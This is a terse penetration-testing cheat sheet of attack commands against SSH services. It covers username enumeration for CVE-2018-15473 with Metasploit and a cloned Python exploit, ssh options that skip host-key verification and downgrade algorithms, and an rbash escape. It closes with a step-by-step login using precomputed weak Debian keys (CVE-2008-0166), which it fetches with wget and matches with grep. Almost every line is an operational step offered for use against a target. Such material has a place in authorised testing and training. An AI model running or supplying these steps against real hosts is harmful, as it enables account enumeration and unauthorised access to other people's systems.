22 ) SSH

• ser Enumeration (OpenSSH 7.7 | CVE-2018-15473)

## ------------------| Using MSF
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS <IP>
set USER_FILE userlist.txt
run

## ------------------| Using Python
git clone https://gitlab.com/epi052/cve-2018-15473.git && cd cve-2018-15473
pip install -r requirements.txt 
python3 ssh-username-enum.py -w userlist.txt <IP>

• SSH login with options

## ------------------| Disable SSH PubKeys [Used for windows with ssh]
ssh -o PubkeyAuthentication=no user@host
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@host
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss user@host

## ------------------| Prevents ssh from attempting to save the host key
ssh -o UserKnownHostsFile=/dev/null user@host

## ------------------| Instruct ssh to not prompt us to accept the host key
ssh -o StrictHostKeyChecking=no user@host

## ------------------| Escape rbash
ssh -t bash user@host

• CVE-2008-0166 (Debian-based systems | September 2006 <--> 2008 May 13th)

https://www.exploit-db.com/exploits/5720

• Predictable PRNG Brute Force SSH

## ------------------| Info
## OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) 
## you need authorized_keys file on your machine.

## ------------------| Setup
## Add "PubkeyAcceptedKeyTypes +ssh-dss" to /etc/ssh/ssh_config file
git clone https://github.com/g0tmi1k/debian-ssh
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_dsa_1024_x86.tar.bz2               
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2
tar -xf *.bz2
## check anything match with authorized_keys file. 
## Copy the first 40 chars in the authorized_keys, then search it in the repo
grep -lr 'AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNA'
## After finding the pub key, The corresponding Private key which is also in the same directory (without pub).
ssh -i key -oKexAlgorithms=+diffie-hellman-group1-sha1 <USER>@$IP